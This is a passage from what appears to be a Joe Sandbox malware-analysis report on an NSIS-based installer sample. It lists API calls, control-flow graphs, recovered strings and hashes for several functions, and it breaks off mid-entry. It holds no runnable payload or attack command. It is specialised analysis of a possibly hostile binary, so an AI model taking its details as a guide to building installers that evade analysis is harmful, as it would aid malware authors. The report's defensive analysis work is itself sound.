                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                  • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                    • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                  • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                  • API String ID: 608394941-1650083594
                                                                                                                                                                                  • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                  • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                                                                                                                  Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,ManufactureJazz,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,ManufactureJazz,ManufactureJazz,00000000,00000000,ManufactureJazz,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                  • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$ManufactureJazz
                                                                                                                                                                                  • API String ID: 4286501637-218748646
                                                                                                                                                                                  • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                  • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                                  • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                                                                                                                  Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                                                                  • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                                  • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                  • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                  • API String ID: 3581403547-784952888
                                                                                                                                                                                  • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                  • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                  • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                                                                  Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Null, xrefs: 0040367E
                                                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                  • Inst, xrefs: 0040366C
                                                                                                                                                                                  • soft, xrefs: 00403675
                                                                                                                                                                                  • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                  • API String ID: 4283519449-527102705
                                                                                                                                                                                  • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                  • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                                                                                                                  Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                  • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                  • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                                                  • API String ID: 651206458-1535804072
                                                                                                                                                                                  • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                  • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                                                  • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                                                                                                                  Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                  • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                  • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                  • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2740478559-0
                                                                                                                                                                                  • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                  • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                                                                                                                  Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
